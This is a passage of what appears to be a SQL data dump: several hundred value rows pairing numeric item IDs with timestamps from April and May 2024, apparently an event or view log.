(10651, NULL, NULL, 2059, 1, '2024-04-29 03:42:51'),
(10652, NULL, NULL, 2058, 1, '2024-04-29 03:43:07'),
(10653, NULL, NULL, 2062, 1, '2024-04-29 03:46:10'),
(10654, NULL, NULL, 2054, 1, '2024-04-29 03:46:19'),
(10655, NULL, NULL, 2061, 1, '2024-04-29 03:54:05'),
(10656, NULL, NULL, 2054, 1, '2024-04-29 03:54:31'),
(10657, NULL, NULL, 2059, 1, '2024-04-29 03:54:47'),
(10658, NULL, NULL, 2058, 1, '2024-04-29 03:55:01'),
(10659, NULL, NULL, 2053, 1, '2024-04-29 03:55:14'),
(10660, NULL, NULL, 2063, 1, '2024-04-29 03:55:23'),
(10661, NULL, NULL, 2062, 1, '2024-04-29 03:55:34'),
(10662, NULL, NULL, 2055, 1, '2024-04-29 03:55:45'),
(10663, NULL, NULL, 2060, 1, '2024-04-29 03:56:04'),
(10664, NULL, NULL, 2064, 1, '2024-04-29 03:56:15'),
(10665, NULL, NULL, 2053, 1, '2024-04-29 04:37:35'),
(10666, NULL, NULL, 2059, 1, '2024-04-29 04:56:11'),
(10667, NULL, NULL, 2058, 1, '2024-04-29 04:59:03'),
(10668, NULL, NULL, 2064, 1, '2024-04-29 04:59:26'),
(10669, NULL, NULL, 2054, 1, '2024-04-29 05:48:09'),
(10670, NULL, NULL, 2064, 1, '2024-04-29 10:41:55'),
(10671, NULL, NULL, 2064, 1, '2024-04-29 14:21:18'),
(10672, NULL, NULL, 2061, 1, '2024-04-29 19:56:26'),
(10673, NULL, NULL, 2061, 1, '2024-04-29 20:27:48'),
(10674, NULL, NULL, 2061, 1, '2024-04-29 23:11:07'),
(10675, NULL, NULL, 2054, 1, '2024-04-30 04:52:36'),
(10676, NULL, NULL, 2060, 1, '2024-04-30 13:23:47'),
(10677, NULL, NULL, 2058, 1, '2024-04-30 18:13:53'),
(10678, NULL, NULL, 2061, 1, '2024-04-30 18:20:21'),
(10679, NULL, NULL, 2064, 1, '2024-05-01 01:44:05'),
(10680, NULL, NULL, 2064, 1, '2024-05-01 01:44:09'),
(10681, NULL, NULL, 2054, 1, '2024-05-01 01:44:18'),
(10682, NULL, NULL, 2064, 1, '2024-05-01 01:44:26'),
(10683, NULL, NULL, 2060, 1, '2024-05-01 01:44:36'),
(10684, NULL, NULL, 2060, 1, '2024-05-01 01:44:39'),
(10685, NULL, NULL, 2059, 1, '2024-05-01 01:45:00'),
(10686, NULL, NULL, 2054, 1, '2024-05-01 01:45:27'),
(10687, NULL, NULL, 2053, 1, '2024-05-01 01:45:50'),
(10688, NULL, NULL, 2061, 1, '2024-05-01 03:54:15'),
(10689, NULL, NULL, 2060, 1, '2024-05-01 05:17:26'),
(10690, NULL, NULL, 2063, 1, '2024-05-01 05:27:28'),
(10691, NULL, NULL, 2058, 1, '2024-05-01 05:47:54'),
(10692, NULL, NULL, 2061, 1, '2024-05-01 05:58:53'),
(10693, NULL, NULL, 2055, 1, '2024-05-01 06:30:22'),
(10694, NULL, NULL, 2061, 1, '2024-05-01 07:54:53'),
(10695, NULL, NULL, 2062, 1, '2024-05-01 08:44:12'),
(10696, NULL, NULL, 2063, 1, '2024-05-01 09:32:20'),
(10697, NULL, NULL, 2062, 1, '2024-05-01 09:32:23'),
(10698, NULL, NULL, 2063, 1, '2024-05-01 09:32:34'),
(10699, NULL, NULL, 2054, 1, '2024-05-01 09:57:02'),
(10700, NULL, NULL, 2060, 1, '2024-05-01 10:34:13'),
(10701, NULL, NULL, 2063, 1, '2024-05-01 10:43:49'),
(10702, NULL, NULL, 2058, 1, '2024-05-01 11:04:29'),
(10703, NULL, NULL, 2064, 1, '2024-05-01 11:07:36'),
(10704, NULL, NULL, 2062, 1, '2024-05-01 11:08:45'),
(10705, NULL, NULL, 2053, 1, '2024-05-01 11:09:12'),
(10706, NULL, NULL, 2063, 1, '2024-05-01 11:10:48'),
(10707, NULL, NULL, 2061, 1, '2024-05-01 11:10:56'),
(10708, NULL, NULL, 2059, 1, '2024-05-01 11:11:09'),
(10709, NULL, NULL, 2058, 1, '2024-05-01 11:11:12'),
(10710, NULL, NULL, 2055, 1, '2024-05-01 11:12:36'),
(10711, NULL, NULL, 2054, 1, '2024-05-01 11:12:44'),
(10712, NULL, NULL, 2060, 1, '2024-05-01 11:16:24'),
(10713, NULL, NULL, 2055, 1, '2024-05-01 11:46:25'),
(10714, NULL, NULL, 2061, 1, '2024-05-01 13:01:43'),
(10715, NULL, NULL, 2062, 1, '2024-05-01 13:45:59'),
(10716, NULL, NULL, 2061, 1, '2024-05-01 14:32:45'),
(10717, NULL, NULL, 2054, 1, '2024-05-01 14:59:47'),
(10718, NULL, NULL, 2059, 1, '2024-05-01 15:14:40'),
(10719, NULL, NULL, 2064, 1, '2024-05-01 15:27:27'),
(10720, NULL, NULL, 2060, 1, '2024-05-01 16:19:26'),
(10721, NULL, NULL, 2064, 1, '2024-05-01 21:47:34'),
(10722, NULL, NULL, 2060, 1, '2024-05-02 00:36:48'),
(10723, NULL, NULL, 2063, 1, '2024-05-02 00:46:45'),
(10724, NULL, NULL, 2058, 1, '2024-05-02 01:07:17'),
(10725, NULL, NULL, 2055, 1, '2024-05-02 01:47:06'),
(10726, NULL, NULL, 2061, 1, '2024-05-02 03:06:41'),
(10727, NULL, NULL, 2062, 1, '2024-05-02 03:55:51'),
(10728, NULL, NULL, 2054, 1, '2024-05-02 05:14:56'),
(10729, NULL, NULL, 2059, 1, '2024-05-02 05:31:43'),
(10730, NULL, NULL, 2064, 1, '2024-05-02 05:46:15'),
(10731, NULL, NULL, 2063, 1, '2024-05-02 06:23:26'),
(10732, NULL, NULL, 2060, 1, '2024-05-02 16:04:54'),
(10733, NULL, NULL, 2063, 1, '2024-05-02 16:09:19'),
(10734, NULL, NULL, 2055, 1, '2024-05-02 18:26:00'),
(10735, NULL, NULL, 2054, 1, '2024-05-03 02:52:41'),
(10736, NULL, NULL, 2059, 1, '2024-05-03 09:28:51'),
(10737, NULL, NULL, 2064, 1, '2024-05-03 18:45:37'),
(10738, NULL, NULL, 2059, 1, '2024-05-03 23:54:59'),
(10739, NULL, NULL, 2054, 1, '2024-05-04 04:53:32'),
(10740, NULL, NULL, 2062, 1, '2024-05-04 04:53:32'),
(10741, NULL, NULL, 2063, 1, '2024-05-04 04:53:32'),
(10742, NULL, NULL, 2058, 1, '2024-05-04 04:53:32'),
(10743, NULL, NULL, 2064, 1, '2024-05-04 04:53:32'),
(10744, NULL, NULL, 2061, 1, '2024-05-04 04:53:32'),
(10745, NULL, NULL, 2059, 1, '2024-05-04 04:53:33'),
(10746, NULL, NULL, 2060, 1, '2024-05-04 04:53:33'),
(10747, NULL, NULL, 2055, 1, '2024-05-04 04:53:33'),
(10748, NULL, NULL, 2062, 1, '2024-05-04 14:53:52'),
(10749, NULL, NULL, 2062, 1, '2024-05-04 14:54:14'),
(10750, NULL, NULL, 2058, 1, '2024-05-05 00:34:56'),
(10751, NULL, NULL, 2063, 1, '2024-05-05 04:48:30'),
(10752, NULL, NULL, 2059, 1, '2024-05-05 10:39:40'),
(10753, NULL, NULL, 2061, 1, '2024-05-05 11:12:50'),
(10754, NULL, NULL, 2059, 1, '2024-05-05 13:58:46'),
(10755, NULL, NULL, 2059, 1, '2024-05-05 15:02:22'),
(10756, NULL, NULL, 2059, 1, '2024-05-05 15:03:08'),
(10757, NULL, NULL, 2059, 1, '2024-05-05 15:03:11'),
(10758, NULL, NULL, 2061, 1, '2024-05-05 16:33:34'),
(10759, NULL, NULL, 2061, 1, '2024-05-05 17:04:41'),
(10760, NULL, NULL, 2062, 1, '2024-05-05 21:38:07'),
(10761, NULL, NULL, 2061, 1, '2024-05-05 22:17:07'),
(10762, NULL, NULL, 2053, 1, '2024-05-06 12:08:04'),
(10763, NULL, NULL, 2054, 1, '2024-05-06 12:08:14'),
(10764, NULL, NULL, 2055, 1, '2024-05-06 12:08:24'),
(10765, NULL, NULL, 2064, 1, '2024-05-06 12:10:00'),
(10766, NULL, NULL, 2063, 1, '2024-05-06 12:10:28'),
(10767, NULL, NULL, 2062, 1, '2024-05-06 12:10:54'),
(10768, NULL, NULL, 2060, 1, '2024-05-06 12:11:21'),
(10769, NULL, NULL, 2059, 1, '2024-05-06 12:11:46'),
(10770, NULL, NULL, 2061, 1, '2024-05-06 12:12:11'),
(10771, NULL, NULL, 2058, 1, '2024-05-06 12:12:35'),
(10772, NULL, NULL, 2054, 1, '2024-05-06 12:16:45'),
(10773, NULL, NULL, 2058, 1, '2024-05-06 13:26:59'),
(10774, NULL, NULL, 2061, 1, '2024-05-06 13:27:14'),
(10775, NULL, NULL, 2059, 1, '2024-05-06 13:27:23'),
(10776, NULL, NULL, 2060, 1, '2024-05-06 13:27:33'),
(10777, NULL, NULL, 2062, 1, '2024-05-06 13:27:41'),
(10778, NULL, NULL, 2063, 1, '2024-05-06 13:27:49'),
(10779, NULL, NULL, 2064, 1, '2024-05-06 13:27:58'),
(10780, NULL, NULL, 2055, 1, '2024-05-06 13:29:25'),
(10781, NULL, NULL, 2054, 1, '2024-05-06 13:29:35'),
(10782, NULL, NULL, 2053, 1, '2024-05-06 13:29:46'),
(10783, NULL, NULL, 2059, 1, '2024-05-07 02:09:10'),
(10784, NULL, NULL, 2059, 1, '2024-05-07 02:09:14'),
(10785, NULL, NULL, 2064, 1, '2024-05-07 03:26:17'),
(10786, NULL, NULL, 2054, 1, '2024-05-07 07:51:18'),
(10787, NULL, NULL, 2064, 1, '2024-05-07 13:21:14'),
(10788, NULL, NULL, 2064, 1, '2024-05-08 03:01:19'),
(10789, NULL, NULL, 2063, 1, '2024-05-08 03:48:50'),
(10790, NULL, NULL, 2054, 1, '2024-05-08 04:29:32'),
(10791, NULL, NULL, 2063, 1, '2024-05-08 04:55:36'),
(10792, NULL, NULL, 2062, 1, '2024-05-08 09:00:04'),
(10793, NULL, NULL, 2064, 1, '2024-05-08 15:19:10'),
(10794, NULL, NULL, 2064, 1, '2024-05-08 23:55:29'),
(10795, NULL, NULL, 2061, 1, '2024-05-09 03:49:02'),
(10796, NULL, NULL, 2060, 1, '2024-05-09 05:06:12'),
(10797, NULL, NULL, 2055, 1, '2024-05-09 09:16:18'),
(10798, NULL, NULL, 2060, 1, '2024-05-09 22:13:26'),
(10799, NULL, NULL, 2060, 1, '2024-05-09 22:34:53'),
(10800, NULL, NULL, 2058, 1, '2024-05-10 01:40:43'),
(10801, NULL, NULL, 2063, 1, '2024-05-10 02:50:17'),
(10802, NULL, NULL, 2063, 1, '2024-05-10 02:50:21'),
(10803, NULL, NULL, 2059, 1, '2024-05-10 05:36:21'),
(10804, NULL, NULL, 2063, 1, '2024-05-10 12:03:51'),
(10805, NULL, NULL, 2060, 1, '2024-05-10 12:09:58'),
(10806, NULL, NULL, 2060, 1, '2024-05-10 13:09:24'),
(10807, NULL, NULL, 2063, 1, '2024-05-10 14:45:10'),
(10808, NULL, NULL, 2059, 1, '2024-05-10 15:08:35'),
(10809, NULL, NULL, 2058, 1, '2024-05-10 16:46:19'),
(10810, NULL, NULL, 2060, 1, '2024-05-10 19:05:56'),
(10811, NULL, NULL, 2060, 1, '2024-05-10 22:59:57'),
(10812, NULL, NULL, 2064, 1, '2024-05-11 01:18:35'),
(10813, NULL, NULL, 2064, 1, '2024-05-11 03:23:09'),
(10814, NULL, NULL, 2061, 1, '2024-05-11 03:34:40'),
(10815, NULL, NULL, 2061, 1, '2024-05-11 03:34:42'),
(10816, NULL, NULL, 2061, 1, '2024-05-11 04:52:15'),
(10817, NULL, NULL, 2064, 1, '2024-05-11 11:07:49'),
(10818, NULL, NULL, 2061, 1, '2024-05-11 11:56:24'),
(10819, NULL, NULL, 2061, 1, '2024-05-11 13:10:37'),
(10820, NULL, NULL, 2060, 1, '2024-05-11 13:39:04'),
(10821, NULL, NULL, 2063, 1, '2024-05-11 13:47:51'),
(10822, NULL, NULL, 2058, 1, '2024-05-11 14:04:09'),
(10823, NULL, NULL, 2058, 1, '2024-05-11 14:10:47'),
(10824, NULL, NULL, 2055, 1, '2024-05-11 15:06:30'),
(10825, NULL, NULL, 2061, 1, '2024-05-11 16:50:15'),
(10826, NULL, NULL, 2062, 1, '2024-05-11 17:45:55'),
(10827, NULL, NULL, 2054, 1, '2024-05-11 19:03:07'),
(10828, NULL, NULL, 2059, 1, '2024-05-11 19:18:00'),
(10829, NULL, NULL, 2064, 1, '2024-05-11 19:30:27'),
(10830, NULL, NULL, 2060, 1, '2024-05-11 23:03:05'),
(10831, NULL, NULL, 2063, 1, '2024-05-11 23:11:53'),
(10832, NULL, NULL, 2058, 1, '2024-05-11 23:34:52'),
(10833, NULL, NULL, 2055, 1, '2024-05-12 00:29:10'),
(10834, NULL, NULL, 2061, 1, '2024-05-12 02:09:56'),
(10835, NULL, NULL, 2062, 1, '2024-05-12 03:06:11'),
(10836, NULL, NULL, 2054, 1, '2024-05-12 04:21:35'),
(10837, NULL, NULL, 2059, 1, '2024-05-12 04:36:31'),
(10838, NULL, NULL, 2064, 1, '2024-05-12 04:49:03'),
(10839, NULL, NULL, 2055, 1, '2024-05-12 07:22:57'),
(10840, NULL, NULL, 2062, 1, '2024-05-12 20:06:29'),
(10841, NULL, NULL, 2060, 1, '2024-05-12 21:41:27'),
(10842, NULL, NULL, 2054, 1, '2024-05-13 00:27:57'),
(10843, NULL, NULL, 2054, 1, '2024-05-13 04:45:55'),
(10844, NULL, NULL, 2062, 1, '2024-05-13 05:50:28'),
(10845, NULL, NULL, 2054, 1, '2024-05-13 08:52:03'),
(10846, NULL, NULL, 2059, 1, '2024-05-13 15:11:11'),
(10847, NULL, NULL, 2059, 1, '2024-05-13 15:11:13'),
(10848, NULL, NULL, 2058, 1, '2024-05-13 15:56:48'),
(10849, NULL, NULL, 2058, 1, '2024-05-13 16:40:31'),
(10850, NULL, NULL, 2061, 1, '2024-05-13 18:38:29'),
(10851, NULL, NULL, 2064, 1, '2024-05-13 19:28:54'),
(10852, NULL, NULL, 2062, 1, '2024-05-13 19:30:16'),
(10853, NULL, NULL, 2053, 1, '2024-05-13 19:30:49'),
(10854, NULL, NULL, 2063, 1, '2024-05-13 19:32:16'),
(10855, NULL, NULL, 2061, 1, '2024-05-13 19:32:28'),
(10856, NULL, NULL, 2059, 1, '2024-05-13 19:32:40'),
(10857, NULL, NULL, 2058, 1, '2024-05-13 19:32:48'),
(10858, NULL, NULL, 2055, 1, '2024-05-13 19:34:08'),
(10859, NULL, NULL, 2054, 1, '2024-05-13 19:34:16'),
(10860, NULL, NULL, 2060, 1, '2024-05-13 19:37:58'),
(10861, NULL, NULL, 2060, 1, '2024-05-13 20:54:38'),
(10862, NULL, NULL, 2063, 1, '2024-05-13 20:54:41'),
(10863, NULL, NULL, 2058, 1, '2024-05-13 20:54:43'),
(10864, NULL, NULL, 2055, 1, '2024-05-13 20:54:47'),
(10865, NULL, NULL, 2061, 1, '2024-05-13 20:54:55'),
(10866, NULL, NULL, 2062, 1, '2024-05-13 20:54:58'),
(10867, NULL, NULL, 2054, 1, '2024-05-13 20:58:32'),
(10868, NULL, NULL, 2059, 1, '2024-05-13 20:59:29'),
(10869, NULL, NULL, 2064, 1, '2024-05-13 21:00:12'),
(10870, NULL, NULL, 2060, 1, '2024-05-13 21:52:54'),
(10871, NULL, NULL, 2061, 1, '2024-05-13 21:54:43'),
(10872, NULL, NULL, 2059, 1, '2024-05-13 21:57:50'),
(10873, NULL, NULL, 2064, 1, '2024-05-13 22:00:16'),
(10874, NULL, NULL, 2062, 1, '2024-05-13 22:02:24'),
(10875, NULL, NULL, 2055, 1, '2024-05-13 22:05:47'),
(10876, NULL, NULL, 2063, 1, '2024-05-13 22:08:40'),
(10877, NULL, NULL, 2058, 1, '2024-05-13 22:09:32'),
(10878, NULL, NULL, 2061, 1, '2024-05-14 05:11:44'),
(10879, NULL, NULL, 2058, 1, '2024-05-14 13:22:22'),
(10880, NULL, NULL, 2063, 1, '2024-05-14 14:30:04'),
(10881, NULL, NULL, 2064, 1, '2024-05-14 17:22:20'),
(10882, NULL, NULL, 2064, 1, '2024-05-14 18:50:18'),
(10883, NULL, NULL, 2059, 1, '2024-05-14 19:41:57'),
(10884, NULL, NULL, 2055, 1, '2024-05-15 03:53:35'),
(10885, NULL, NULL, 2055, 1, '2024-05-15 05:25:39'),
(10886, NULL, NULL, 2059, 1, '2024-05-15 10:24:48'),
(10887, NULL, NULL, 2063, 1, '2024-05-15 10:49:14'),
(10888, NULL, NULL, 2054, 1, '2024-05-15 12:56:50'),
(10889, NULL, NULL, 2064, 1, '2024-05-15 16:26:23'),
(10890, NULL, NULL, 2063, 1, '2024-05-15 22:42:16'),
(10891, NULL, NULL, 2064, 1, '2024-05-16 02:33:29'),
(10892, NULL, NULL, 2054, 1, '2024-05-16 02:34:05'),
(10893, NULL, NULL, 2055, 1, '2024-05-16 04:24:05'),
(10894, NULL, NULL, 2054, 1, '2024-05-16 05:43:41'),
(10895, NULL, NULL, 2059, 1, '2024-05-16 06:38:13'),
(10896, NULL, NULL, 2062, 1, '2024-05-16 09:54:31'),
(10897, NULL, NULL, 2063, 1, '2024-05-16 11:20:06'),
(10898, NULL, NULL, 2058, 1, '2024-05-16 11:26:54'),
(10899, NULL, NULL, 2064, 1, '2024-05-16 11:32:56'),
(10900, NULL, NULL, 2064, 1, '2024-05-16 11:34:07'),
(10901, NULL, NULL, 2061, 1, '2024-05-16 12:30:37'),
(10902, NULL, NULL, 2055, 1, '2024-05-16 14:05:09'),
(10903, NULL, NULL, 2055, 1, '2024-05-16 15:33:46'),
(10904, NULL, NULL, 2063, 1, '2024-05-16 15:33:51'),
(10905, NULL, NULL, 2058, 1, '2024-05-16 15:34:05'),
(10906, NULL, NULL, 2058, 1, '2024-05-16 15:58:45'),
(10907, NULL, NULL, 2055, 1, '2024-05-16 16:14:44'),
(10908, NULL, NULL, 2062, 1, '2024-05-16 20:35:39'),
(10909, NULL, NULL, 2059, 1, '2024-05-16 20:36:06'),
(10910, NULL, NULL, 2062, 1, '2024-05-16 20:45:20'),
(10911, NULL, NULL, 2060, 1, '2024-05-16 22:10:19'),
(10912, NULL, NULL, 2059, 1, '2024-05-17 05:16:40'),
(10913, NULL, NULL, 2062, 1, '2024-05-17 05:17:33'),
(10914, NULL, NULL, 2059, 1, '2024-05-17 05:47:52'),
(10915, NULL, NULL, 2063, 1, '2024-05-17 07:29:30'),
(10916, NULL, NULL, 2064, 1, '2024-05-17 17:04:09'),
(10917, NULL, NULL, 2062, 1, '2024-05-17 17:54:01'),
(10918, NULL, NULL, 2061, 1, '2024-05-17 18:05:17'),
(10919, NULL, NULL, 2062, 1, '2024-05-17 21:56:04'),
(10920, NULL, NULL, 2062, 1, '2024-05-17 21:56:41'),
(10921, NULL, NULL, 2062, 1, '2024-05-17 22:10:57'),
(10922, NULL, NULL, 2054, 1, '2024-05-17 23:01:25'),
(10923, NULL, NULL, 2055, 1, '2024-05-18 02:27:27'),
(10924, NULL, NULL, 2061, 1, '2024-05-18 03:42:45'),
(10925, NULL, NULL, 2053, 1, '2024-05-18 03:48:10'),
(10926, NULL, NULL, 2061, 1, '2024-05-18 04:59:40'),
(10927, NULL, NULL, 2055, 1, '2024-05-18 06:37:42'),
(10928, NULL, NULL, 2062, 1, '2024-05-18 12:56:02'),
(10929, NULL, NULL, 2059, 1, '2024-05-18 15:59:29'),
(10930, NULL, NULL, 2059, 1, '2024-05-18 16:39:51'),
(10931, NULL, NULL, 2059, 1, '2024-05-18 19:33:10'),
(10932, NULL, NULL, 2062, 1, '2024-05-18 19:34:44'),
(10933, NULL, NULL, 2060, 1, '2024-05-18 19:35:09'),
(10934, NULL, NULL, 2061, 1, '2024-05-18 19:35:16'),
(10935, NULL, NULL, 2061, 1, '2024-05-18 19:35:32'),
(10936, NULL, NULL, 2060, 1, '2024-05-18 19:37:15'),
(10937, NULL, NULL, 2055, 1, '2024-05-18 20:25:55'),
(10938, NULL, NULL, 2060, 1, '2024-05-19 17:46:55'),
(10939, NULL, NULL, 2054, 1, '2024-05-19 17:47:00'),
(10940, NULL, NULL, 2060, 1, '2024-05-19 19:27:38'),
(10941, NULL, NULL, 2058, 1, '2024-05-19 23:51:55'),
(10942, NULL, NULL, 2055, 1, '2024-05-20 02:09:26'),
(10943, NULL, NULL, 2064, 1, '2024-05-20 02:10:01'),
(10944, NULL, NULL, 2063, 1, '2024-05-20 02:10:16'),
(10945, NULL, NULL, 2062, 1, '2024-05-20 02:10:29'),
(10946, NULL, NULL, 2060, 1, '2024-05-20 02:10:43'),
(10947, NULL, NULL, 2054, 1, '2024-05-20 11:45:57'),
(10948, NULL, NULL, 2053, 1, '2024-05-20 13:23:58'),
(10949, NULL, NULL, 2054, 1, '2024-05-20 13:52:30'),
(10950, NULL, NULL, 2063, 1, '2024-05-20 16:16:04'),
(10951, NULL, NULL, 2064, 1, '2024-05-20 16:16:28'),
(10952, NULL, NULL, 2059, 1, '2024-05-20 16:41:23'),
(10953, NULL, NULL, 2063, 1, '2024-05-20 18:20:43'),
(10954, NULL, NULL, 2054, 1, '2024-05-20 23:52:22'),
(10955, NULL, NULL, 2061, 1, '2024-05-21 00:22:36'),
(10956, NULL, NULL, 2061, 1, '2024-05-21 09:03:25'),
(10957, NULL, NULL, 2064, 1, '2024-05-21 09:03:25'),
(10958, NULL, NULL, 2060, 1, '2024-05-21 09:03:25'),
(10959, NULL, NULL, 2055, 1, '2024-05-21 09:03:25'),
(10960, NULL, NULL, 2058, 1, '2024-05-21 09:03:25'),
(10961, NULL, NULL, 2054, 1, '2024-05-21 09:03:25'),
(10962, NULL, NULL, 2063, 1, '2024-05-21 09:03:25'),
(10963, NULL, NULL, 2062, 1, '2024-05-21 09:03:25'),
(10964, NULL, NULL, 2059, 1, '2024-05-21 09:03:25'),
(10965, NULL, NULL, 2054, 1, '2024-05-21 09:42:03'),
(10966, NULL, NULL, 2061, 1, '2024-05-21 15:28:51'),
(10967, NULL, NULL, 2054, 1, '2024-05-21 17:40:03'),
(10968, NULL, NULL, 2053, 1, '2024-05-21 19:43:34'),
(10969, NULL, NULL, 2054, 1, '2024-05-22 05:45:47'),
(10970, NULL, NULL, 2054, 1, '2024-05-22 20:11:07'),
(10971, NULL, NULL, 2053, 1, '2024-05-22 23:10:23'),
(10972, NULL, NULL, 2063, 1, '2024-05-23 01:23:49'),
(10973, NULL, NULL, 2060, 1, '2024-05-23 04:20:18'),
(10974, NULL, NULL, 2063, 1, '2024-05-23 04:28:48'),
(10975, NULL, NULL, 2058, 1, '2024-05-23 04:51:07'),
(10976, NULL, NULL, 2064, 1, '2024-05-23 05:09:48'),
(10977, NULL, NULL, 2055, 1, '2024-05-23 05:36:55'),
(10978, NULL, NULL, 2061, 1, '2024-05-23 06:56:34'),
(10979, NULL, NULL, 2062, 1, '2024-05-23 07:38:27'),
(10980, NULL, NULL, 2054, 1, '2024-05-23 09:05:44'),
(10981, NULL, NULL, 2059, 1, '2024-05-23 09:25:08'),
(10982, NULL, NULL, 2054, 1, '2024-05-23 09:40:23'),
(10983, NULL, NULL, 2064, 1, '2024-05-23 09:42:16'),
(10984, NULL, NULL, 2060, 1, '2024-05-23 11:21:36'),
(10985, NULL, NULL, 2064, 1, '2024-05-23 17:39:07'),
(10986, NULL, NULL, 2054, 1, '2024-05-23 17:45:40'),
(10987, NULL, NULL, 2054, 1, '2024-05-23 19:09:28'),
(10988, NULL, NULL, 2060, 1, '2024-05-23 19:09:33'),
(10989, NULL, NULL, 2062, 1, '2024-05-23 23:50:23'),
(10990, NULL, NULL, 2054, 1, '2024-05-24 01:19:54'),
(10991, NULL, NULL, 2055, 1, '2024-05-24 01:19:58'),
(10992, NULL, NULL, 2064, 1, '2024-05-24 01:20:02'),
(10993, NULL, NULL, 2063, 1, '2024-05-24 01:20:04'),
(10994, NULL, NULL, 2062, 1, '2024-05-24 01:20:06'),
(10995, NULL, NULL, 2060, 1, '2024-05-24 01:20:07'),
(10996, NULL, NULL, 2059, 1, '2024-05-24 01:20:08'),
(10997, NULL, NULL, 2061, 1, '2024-05-24 01:20:10'),
(10998, NULL, NULL, 2058, 1, '2024-05-24 01:20:11'),
(10999, NULL, NULL, 2058, 1, '2024-05-24 07:59:32'),
(11000, NULL, NULL, 2064, 1, '2024-05-24 10:12:42'),
(11001, NULL, NULL, 2062, 1, '2024-05-24 14:30:51'),
(11002, NULL, NULL, 2062, 1, '2024-05-24 15:08:23'),
(11003, NULL, NULL, 2053, 1, '2024-05-24 17:00:43'),
(11004, NULL, NULL, 2061, 1, '2024-05-25 01:25:23'),
(11005, NULL, NULL, 2055, 1, '2024-05-25 01:25:35'),
(11006, NULL, NULL, 2059, 1, '2024-05-25 01:25:46'),
(11007, NULL, NULL, 2064, 1, '2024-05-25 01:26:15'),
(11008, NULL, NULL, 2058, 1, '2024-05-25 01:27:01'),
(11009, NULL, NULL, 2062, 1, '2024-05-25 01:27:10'),
(11010, NULL, NULL, 2063, 1, '2024-05-25 01:29:36'),
(11011, NULL, NULL, 2053, 1, '2024-05-25 01:30:27'),
(11012, NULL, NULL, 2058, 1, '2024-05-25 01:48:16'),
(11013, NULL, NULL, 2059, 1, '2024-05-25 01:52:45'),
(11014, NULL, NULL, 2063, 1, '2024-05-25 01:53:26'),
(11015, NULL, NULL, 2055, 1, '2024-05-25 01:57:24'),
(11016, NULL, NULL, 2054, 1, '2024-05-25 02:03:27'),
(11017, NULL, NULL, 2054, 1, '2024-05-25 02:05:32'),
(11018, NULL, NULL, 2062, 1, '2024-05-25 02:51:21'),
(11019, NULL, NULL, 2064, 1, '2024-05-25 03:31:50'),
(11020, NULL, NULL, 2060, 1, '2024-05-25 04:07:43'),
(11021, NULL, NULL, 2063, 1, '2024-05-25 13:28:55'),
(11022, NULL, NULL, 2061, 1, '2024-05-25 20:54:49'),
(11023, NULL, NULL, 2053, 1, '2024-05-26 01:19:32'),
(11024, NULL, NULL, 2064, 1, '2024-05-26 03:11:20'),
(11025, NULL, NULL, 2055, 1, '2024-05-26 03:23:04'),
(11026, NULL, NULL, 2058, 1, '2024-05-26 05:08:27'),
(11027, NULL, NULL, 2053, 1, '2024-05-26 13:52:26'),
(11028, NULL, NULL, 2053, 1, '2024-05-26 15:53:42'),
(11029, NULL, NULL, 2064, 1, '2024-05-26 19:35:06'),
(11030, NULL, NULL, 2058, 1, '2024-05-26 19:45:55'),
(11031, NULL, NULL, 2064, 1, '2024-05-27 00:30:34'),
(11032, NULL, NULL, 2064, 1, '2024-05-27 00:30:39'),
(11033, NULL, NULL, 2064, 1, '2024-05-27 00:30:42'),
(11034, NULL, NULL, 2063, 1, '2024-05-27 00:30:45'),
(11035, NULL, NULL, 2062, 1, '2024-05-27 00:30:48'),
(11036, NULL, NULL, 2061, 1, '2024-05-27 00:30:51'),
(11037, NULL, NULL, 2060, 1, '2024-05-27 00:30:54'),
(11038, NULL, NULL, 2059, 1, '2024-05-27 00:30:57'),
(11039, NULL, NULL, 2058, 1, '2024-05-27 04:34:02'),
(11040, NULL, NULL, 2059, 1, '2024-05-27 08:01:44'),
(11041, NULL, NULL, 2061, 1, '2024-05-27 19:01:16'),
(11042, NULL, NULL, 2058, 1, '2024-05-27 22:22:41'),
(11043, NULL, NULL, 2062, 1, '2024-05-28 05:47:34'),
(11044, NULL, NULL, 2058, 1, '2024-05-28 09:22:19'),
(11045, NULL, NULL, 2064, 1, '2024-05-28 09:22:34'),
(11046, NULL, NULL, 2062, 1, '2024-05-28 09:22:54'),
(11047, NULL, NULL, 2055, 1, '2024-05-28 09:22:57'),
(11048, NULL, NULL, 2054, 1, '2024-05-28 09:23:07'),
(11049, NULL, NULL, 2059, 1, '2024-05-28 09:23:17'),
(11050, NULL, NULL, 2063, 1, '2024-05-28 09:23:19'),
(11051, NULL, NULL, 2061, 1, '2024-05-28 09:23:22'),
(11052, NULL, NULL, 2060, 1, '2024-05-28 09:23:28'),
(11053, NULL, NULL, 2058, 1, '2024-05-28 09:24:09'),
(11054, NULL, NULL, 2064, 1, '2024-05-28 09:24:20'),
(11055, NULL, NULL, 2062, 1, '2024-05-28 09:24:50'),
(11056, NULL, NULL, 2055, 1, '2024-05-28 09:24:52'),
(11057, NULL, NULL, 2059, 1, '2024-05-28 09:24:58'),
(11058, NULL, NULL, 2063, 1, '2024-05-28 09:25:00'),
(11059, NULL, NULL, 2054, 1, '2024-05-28 09:25:03'),
(11060, NULL, NULL, 2061, 1, '2024-05-28 09:25:05'),
(11061, NULL, NULL, 2060, 1, '2024-05-28 09:25:26'),
(11062, NULL, NULL, 2053, 1, '2024-05-28 09:25:33'),
(11063, NULL, NULL, 2064, 1, '2024-05-28 12:36:45'),
(11064, NULL, NULL, 2064, 1, '2024-05-28 13:11:05'),
(11065, NULL, NULL, 2055, 1, '2024-05-28 17:12:12'),
(11066, NULL, NULL, 2063, 1, '2024-05-28 23:26:26'),
(11067, NULL, NULL, 2054, 1, '2024-05-29 04:51:21'),
(11068, NULL, NULL, 2064, 1, '2024-05-29 07:52:49'),
(11069, NULL, NULL, 2064, 1, '2024-05-29 17:16:05'),
(11070, NULL, NULL, 2061, 1, '2024-05-29 19:15:54'),
(11071, NULL, NULL, 2062, 1, '2024-05-29 19:35:25'),
(11072, NULL, NULL, 2054, 1, '2024-05-29 22:16:24'),
(11073, NULL, NULL, 2059, 1, '2024-05-29 23:37:38'),
(11074, NULL, NULL, 2063, 1, '2024-05-30 00:11:11'),
(11075, NULL, NULL, 2059, 1, '2024-05-30 08:06:26'),
(11076, NULL, NULL, 2064, 1, '2024-05-30 12:55:19'),
(11077, NULL, NULL, 2053, 1, '2024-05-30 15:26:13'),
(11078, NULL, NULL, 2062, 1, '2024-05-30 16:48:36'),
